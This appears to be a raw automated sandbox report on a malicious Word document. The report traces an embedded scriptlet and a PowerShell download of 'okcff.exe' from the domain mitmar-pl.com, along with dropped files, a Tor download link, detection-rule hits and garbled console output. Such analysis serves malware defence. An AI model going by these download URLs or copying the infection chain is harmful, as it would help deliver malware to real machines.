Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5349C035-C6A0-4C16-B632-E1A36FB414FC}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: mitmar-pl.com

Source: global traffic	HTTP traffic detected: GET /okcff.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mitmar-pl.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Crkrqdrd.jpeg HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive

System Summary:

Microsoft Office creates scripting files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT

Jump to behavior

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe

Jump to dropped file

Document contains OLE streams with names of living off the land binaries

Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr	Stream path '_1703660897/\x1Ole10Native' : 4{....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaD.\abdtfhghgeghDp..ScT.<.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr	Stream path '_1703660925/\x1Ole10Native' : $\|....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..z..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Document contains a stream with embedded javascript code

Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr	Stream path '_1703660897/\x1Ole10Native' : Found JS content: 4{....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaD.\abdtfhghgeghDp..ScT.<............................................................................................................................................................
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr	Stream path '_1703660925/\x1Ole10Native' : Found JS content: $\|....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..z.....................................................................................................................................

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\okcff.exe

Jump to dropped file

.NET source code contains very large array initializations

Source: 41.0.okcff.exe.400000.5.unpack, u003cPrivateImplementationDetailsu003eu007bFF1D0D87u002d84BBu002d46D1u002d97D2u002dB6B1FCD58796u007d/u003252DC26Eu002d1C55u002d40FBu002d95BAu002dCAC79903EF30.cs	Large array initialization: .cctor: array initializer size 11933
Source: 41.0.okcff.exe.400000.7.unpack, u003cPrivateImplementationDetailsu003eu007bFF1D0D87u002d84BBu002d46D1u002d97D2u002dB6B1FCD58796u007d/u003252DC26Eu002d1C55u002d40FBu002d95BAu002dCAC79903EF30.cs	Large array initialization: .cctor: array initializer size 11933
Source: 41.0.okcff.exe.400000.9.unpack, u003cPrivateImplementationDetailsu003eu007bFF1D0D87u002d84BBu002d46D1u002d97D2u002dB6B1FCD58796u007d/u003252DC26Eu002d1C55u002d40FBu002d95BAu002dCAC79903EF30.cs	Large array initialization: .cctor: array initializer size 11933
Source: 41.0.okcff.exe.400000.13.unpack, u003cPrivateImplementationDetailsu003eu007bFF1D0D87u002d84BBu002d46D1u002d97D2u002dB6B1FCD58796u007d/u003252DC26Eu002d1C55u002d40FBu002d95BAu002dCAC79903EF30.cs	Large array initialization: .cctor: array initializer size 11933

Found suspicious RTF objects

Source: abdtfhgXgeghDp.ScT

Static RTF information: Object: 0 Offset: 000007CDh abdtfhgXgeghDp.ScT

Yara signature match

Source: 9.2.okcff.exe.334b4b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000003.00000002.436663453.0000000000380000.00000004.00000020.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28

Document has an unknown application name

Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr

OLE indicator application name: unknown

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_003D2519	9_2_003D2519
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_003D4D79	9_2_003D4D79
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_02110940	9_2_02110940
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_02110E00	9_2_02110E00
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_0218D148	9_2_0218D148
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_0218778F	9_2_0218778F
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_02184B98	9_2_02184B98
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_0218A8D0	9_2_0218A8D0
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_02187F38	9_2_02187F38
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_02188D88	9_2_02188D88
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_02189022	9_2_02189022
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_02184EC8	9_2_02184EC8
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_02185C80	9_2_02185C80
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_021A4AB0	9_2_021A4AB0
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_0542A0E3	9_2_0542A0E3
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_0542B370	9_2_0542B370
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_0542AEC0	9_2_0542AEC0
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_0542A12A	9_2_0542A12A
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_0542A807	9_2_0542A807
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_0542A8F2	9_2_0542A8F2
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_0542AF82	9_2_0542AF82
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 9_2_0542078A	9_2_0542078A
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 41_2_00205330	41_2_00205330
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 41_2_00206350	41_2_00206350
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 41_2_00202099	41_2_00202099
Source: C:\Users\user\AppData\Roaming\okcff.exe	Code function: 41_2_00205678	41_2_00205678

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Document contains no OLE stream with summary information

Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr

OLE indicator has summary info: false

PE file contains strange resources

Source: okcff[1].exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: okcff.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Roaming\okcff.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\okcff.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\okcff.exe	Memory allocated: 76E90000 page execute and read and write

Source: 478644.doc	Virustotal: Detection: 41%
Source: 478644.doc	ReversingLabs: Detection: 30%

Source: C:\Users\user\AppData\Roaming\okcff.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............................................`I.........v.....................K......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#................bGk......................W.............}..v............0...............(.p.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../................eGk......p...............W.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../................bGk......................W.............}..v....H.......0...............(.p.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.8.............}..v....X.......0.................p.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;................bGk......................W.............}..v............0...............(.p.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G................eGk......p...............W.............}..v....X.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G................bGk......................W.............}..v............0...............(.p.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S................eGk......p...............W.............}..v....X.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S................bGk......................W.............}..v............0...............(.p.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._.......b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.o.k.c.f.f...e.x.e.'.....0.................p.....<.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._................bGk......................W.............}..v............0...............(.p.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k................eGk......p...............W.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k................bGk......................W.............}..v............0...............(.p.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w....... . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.... .......0.................p.....&.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w................bGk......................W.............}..v....X.......0...............(.p.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................eGk......................W.............}..v.... !......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................bGk.....!................W.............}..v....X"......0...............(.p.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................p.....<.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................bGk....P'................W.............}..v.....'......0...............(.p.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ ........eGk......p...............W.............}..v....`+......0.................p.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................bGk.....,................W.............}..v.....,......0...............(.p.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................p.......#.......................p.......................`I.........v.....................K......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............}.jk......................W.............}..v............0................!].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...P.......0...............H!].....6.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............}.jk......................W.............}..v............0................!].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.W.............}..v............0...............H!].....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............}.jk....P.................W.............}..v............0................!].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G.................jk.....$]...............W.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............}.jk....P.................W.............}..v............0................!].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S.................jk.....$]...............W.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............}.jk....P.................W.............}..v............0................!].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._.......b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.o.k.c.f.f...e.x.e.'.....0...............H!].....<.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............}.jk......................W.............}..v....H.......0................!].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k.................jk.....$]...............W.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............}.jk......................W.............}..v....@.......0................!].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.E.....w.................jk.....$]...............W.............}..v....x.......0.......................f.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............}.jk....0.................W.............}..v............0................!].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .........jk.....$]...............W.............}..v....@.......0...............H!].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................}.jk......................W.............}..v....x.......0................!].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.E.....................mljk.... .]...............W.............}..v....pF......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................ljk....(G................W.............}..v.....G......0...............x.].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................mljk.... .]...............W.............}..v....8N......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................ljk.....N................W.............}..v....pO......0...............x.].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.8.............}..v.....S......0.................].....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................ljk....8T................W.............}..v.....T......0...............x.].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................mljk.... .]...............W.............}..v.....[......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................ljk....8\................W.............}..v.....\......0...............x.].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................mljk.... .]...............W.............}..v.....c......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................ljk....8d................W.............}..v.....d......0...............x.].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.o.k.c.f.f...e.x.e.'.....0.................].....<.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................ljk.....i................W.............}..v....0j......0...............x.].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................mljk.... .]...............W.............}..v.....p......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................ljk.....q................W.............}..v....0r......0...............x.].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....Hv......0.................].....&.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................ljk.....w................W.............}..v.....w......0...............x.].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................mljk.... .]...............W.............}..v....H~......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................ljk......................W.............}..v............0...............x.].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................].....<.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................ljk....x.................W.............}..v............0...............x.].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......mljk.... .]...............W.............}..v............0.................].............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................ljk....@.................W.............}..v............0...............x.].............................	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................W.a.i.t.i.n.g. .f.o.r. .2.....p...............................................................................	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................1.e.c.(.P.............,.......T.......Y.......................e. .......................................Zs....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............,.......T...............................e. .......................................Zs....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............,.......T...............................e. .............................H.........Zs....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: .................... .............W.a.i.t.i.n.g. .f.o.r. .2.....0.......h.......................0...............................................	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................1.e.c.(.P.....................0...............................e. .......................................Qs....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....................0...............................e. .......................................Qs....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....................0.......2.......................e. .............................8.........Qs....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ....................`. ...........W.a.i.t.i.n.g. .f.o.r. .2.....................................0.................&....................... .....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............&.....J................. .....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................1.e.c.(.P..... .......................b.......................e. ...............&.......................ms....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P..... .......................L.......................e. ...............&.......................ms....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P..... ...............................................e. ...............&.......................ms....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ......................#...........W.a.i.t.i.n.g. .f.o.r. .2.....8...............................................8.).......................#.....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............8.).....J.................#.....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................1.e.c.(.P.............X.......8...............................e. .............8.).......................bs....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............X.......................................e. .............8.).......................bs....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............X.......8...............................e. .............8.).............X.........bs....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ....................(.............W.a.i.t.i.n.g. .f.o.r. .2.....x...............................0...............................................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................1.e.c.(.P.....................x.......O.......................e. .......................................Es....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....................x.......K.......................e. .......................................Es....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....................x...............................e. .......................................Es....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................W.a.i.t.i.n.g. .f.o.r. .2.....................................0.................'.............................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............'.....J.......................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................1.e.c.(.P.....T.......................;.......................e. ...............'.......................ls....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....T...............................................e. ...............'.......................ls....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....T...............................................e. ...............'.............(.........ls....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ...................... ...........W.a.i.t.i.n.g. .f.o.r. .2.....p...............................0.................&....................... .....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............&.....J................. .....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................1.e.c.(.P.....................p...............................e. ...............&.......................ms....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....................p...............................e. ...............&.......................ms....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....................p.......q.......................e. ...............&.......................ms....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ....................\.............W.a.i.t.i.n.g. .f.o.r. .2.............T.......................................................................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................1.e.c.(.P.....x...............................................e. .......................................@s....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....x...............................................e. .......................................@s....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....x...............................................e. .......................................@s....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................W.a.i.t.i.n.g. .f.o.r. .2.............B.......................0...............(.&.............................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............(.&.....J.......................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................1.e.c.(.P.....................................................e. .............(.&.......................ls....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............................. ......................e. .............(.&.......................ls....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............................. ......................e. .............(.&.............h.........ls....

